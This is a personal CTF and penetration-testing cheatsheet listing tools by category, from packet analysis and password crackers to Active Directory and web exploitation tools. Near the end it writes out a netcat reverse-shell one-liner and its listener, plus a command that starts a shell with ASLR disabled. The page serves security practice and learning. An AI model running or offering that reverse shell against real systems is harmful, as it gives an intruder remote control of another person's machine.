CTF and Pentest tools cheatsheet

I'll try to keep here all the fantastic stuff I discover and use during CTFs for ease of reference.


Manipulate pcap and pcapng files with Python

  • Scapy : Very powerful but steep learning curve, can be used for both static analysis and realtime packet manipulation.
  • dpkt : Quick setup and fast but not many features, accessing nested packet contents can be cumbersome.
  • pyshark : Python wrapper for tshark, which allows the use of Wireshark Dissectors.
  • pypacker : Built on top of dpkt, fast as well but doesn’t do anything the other don’t.

Bruteforce web app subdomains, files and directories

  • gobuster : Written in Go, can also find host names.
  • dirb : Kali’s version
  • dirbuster : OWASP’s version (can also bruteforce letter by letter)
  • afl++ : Not a bruteforce tool but an awesome fuzzer


Package management

  • FPM : Easy and fast method to create and tweak packages for a huge variety of systems
  • Poetry : An elegant python package creator and manager

Password crackers

  • john : Does it really need an introduction ?
  • hydra : My personal preference
  • fcrackzip : A cool tool but hydra is usually faster


  • SageMath : Mathematical computation with a Python API
  • z3 : Theorem prover from Microsoft, has Python, C and C++ API
  • Alpertron : Easily factorize big integers online
  • RsaCtfTools : Amounts for 95% of my flags in the crypto category

Webhooks and HTTP requests

  • RequestBin : Online HTTP/Webhook requests collector when whipping up a full-fledged C2 would be overkill.

GDB enhancements

  • GEF : Single file and fast.
  • PwnDBG : Setup is quite cumbersome when on a hurry but there’s a bootload of features and extensions available.
  • peda : Single file with a lib folder, quite easy to c/p on a remote target when needed. Not actively maintained but still working very well.

Online services

  • CyberChef : Great and intuitive UI for manipulating data, files and ciphers. All online but can be run locally if needed.
  • ngrok : Expose your LAN to the outside for quick C2 or file serving.


  • Wireshark : The uncontested king of packet analysis
  • A really complete cheatsheet
  • Photorec : Recovers 180+ file types from a disk
  • Binwalk : Extract firmware images and files
  • Sleuthkit : Collection of utilities for FS analysis.
  • Autopsy : Graphical interface for the sleuth kit.
  • Bulk Extractor : Extract whatever you can from an image. Not so subtle, but oh so efficient.
  • Volatility : The best tool to analyze memory dumps. Sometimes finicky, will need some plugins to give its all.
    • Dwarf2json : Must-have for Vol3 users to generate a profile for the target system

Other awesome Python packages and scripts

  • Pwntools : Awesome utils and functions for all matters of binary exploitation.
  • DNSsteal : Fake DNS server for data exfiltration through DNS requests
  • pspy : Monitor system processes without root access

Reverse engineering

  • Ghidra : The NSA decompiler/disassembler
  • Cutter : FOSS wrapper for Rizin
    • Good decompiler with the r2ghidra plugin
  • radare2 : Super powerful but cryptic as fuck
    • Also benefits from r2ghidra
  • ghex : A nice hexditor for Gnome/Mate DM
  • Blukat : Get libc version for building ROPs

Automated tools

  • nmap : The one and only
  • WPscan : When you’re willing to shoot the ambulance
  • SQLmap : Because no one wants to do it by hand

Windows / Active Directory tools

  • mimikatz : Exploitation and post-exploitation made easy
  • Evil-WinRM : An incredible remote shell (provided you pwned the system already, of course)
  • impacket : Not specifically windows-oriented but can be used to communicate with almost all protocols MS uses
  • SMBmap : Enumerate samba shares across an entire domain
  • SMBclient : For when SMBmap finishes
  • Bloodhound : Find uninteded relationships to exploit in an AD environment

Web exploitation

  • Burp Suite : The best proxy around for Web exploits
  • Owasp ZAP : A good contender to Burp
  • Nikto2 : Automated and comprehensive web scanner
  • BeEF framework : Complete control over an unlucky browser


  • Kali Linux : Industry standard.
  • Parrot OS : Also Debian based, it’s my favorite atm. A bit less lightweight but really stylish and with the same quality of tools.
  • BlackArch : My friend (who uses Arch, btw) only swears by it. Didn’t try by myself, though.
  • FlareVM : From FireEye, godlike for Windows malware analysis

Useful bash commands

Netcat reverse shell without -e argument (from reverse shell cheatsheet)

  • From attacker : nc -nlvp 4567
  • From target : rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 4567 > /tmp/f

Start a shell without ASLR if you don’t wanna mess with /proc/sys/kernel/randomize_va_space

setarch `uname -m` -R /bin/bash

Built with Hugo - Theme Stack